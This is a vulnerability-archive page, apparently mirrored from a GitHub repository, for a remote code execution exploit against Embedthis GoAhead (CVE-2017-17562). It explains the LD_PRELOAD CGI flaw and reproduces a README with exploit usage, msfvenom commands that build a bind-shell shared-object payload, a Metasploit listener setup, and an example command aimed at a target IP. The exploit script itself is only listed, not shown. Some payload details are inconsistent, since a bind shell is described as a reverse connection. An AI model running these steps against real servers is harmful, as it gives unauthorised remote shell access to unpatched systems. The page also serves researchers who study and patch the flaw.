Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2017-17562 PoC — Embedthis GoAhead 安全漏洞

Source
https://github.com/nu11pointer/goahead-rce-exploit
Associated Vulnerability
Title:Embedthis GoAhead 安全漏洞 (CVE-2017-17562)
Description:Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked. This is a result of initializing the environment of forked CGI scripts using untrusted HTTP request parameters in the cgiHandler function in cgi.c. When combined with the glibc dynamic linker, this behaviour can be abused for remote code execution using special parameter names such as LD_PRELOAD. An attacker can POST their shared object payload in the body of the request, and reference it using /proc/self/fd/0.
Description
Exploit for CVE-2017-17562 vulnerability, that allows RCE on GoAhead (< v3.6.5) if the CGI is enabled and a CGI program is dynamically linked.
Readme
# GoAhead Web Server 2.5 < 3.6.5 - HTTPd 'LD_PRELOAD' Remote Code Execution

Exploit for CVE-2017-17562 vulnerability, that allows RCE on GoAhead (&lt; v3.6.5) if the CGI is enabled and a CGI program is dynamically linked.

## Usage

```sh
$ python3 exploit.py [-h] --host HOST --port PORT --payload PAYLOAD [--ssl] [--cgi CGI]
```

## Requirements

```
$ python3 -m pip install -r requirements.txt
```

### Attention!

You need to generate the payload and set up the listening connection first.  
Example:  
(Attacker: 192.168.1.100 - Victim: 192.168.1.200)  

```sh
$ msfvenom -a x64 --platform Linux -p generic/shell_bind_tcp LHOST=192.168.1.100 LPORT=1337 -f elf-so -o payload.so
$ msfconsole
msf6 > use multi/handler
msf6 exploit(multi/handler) > set payload generic/shell_bind_tcp
msf6 exploit(multi/handler) > set LPORT=1337
msf6 exploit(multi/handler) > set RHOST=192.168.1.200
msf6 exploit(multi/handler) > run
[*] Started bind TCP handler against 192.168.1.200:1337
```

Then, in another shell, you must run this exploit to send the payload that will start the reverse connection to the listener!  

### Arguments

```txt
Required arguments:
  --host HOST        Host running the GoAhead webserver.
  --port PORT        Port running the GoAhead webserver. Default: 80
  --payload PAYLOAD  Path to the payload.

Optional arguments:
  --ssl              Host is using SSL.
  --cgi LIST         Paths list to discover the CGI script on the GoAhead server. Default: paths.lst
```

## Example

```sh
$ python3 exploit.py --host 192.168.1.200 --port 8080 --cgi custom_list.txt --payload payload.so --ssl
```
File Snapshot

 [4.0K]  /data/pocs/dd16c878a078985cb71f09da776b3dacdf9e65c5
├── [5.5K]  exploit.py
├── [ 635]  paths.lst
├── [1.6K]  README.md
└── [  17]  requirements.txt

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →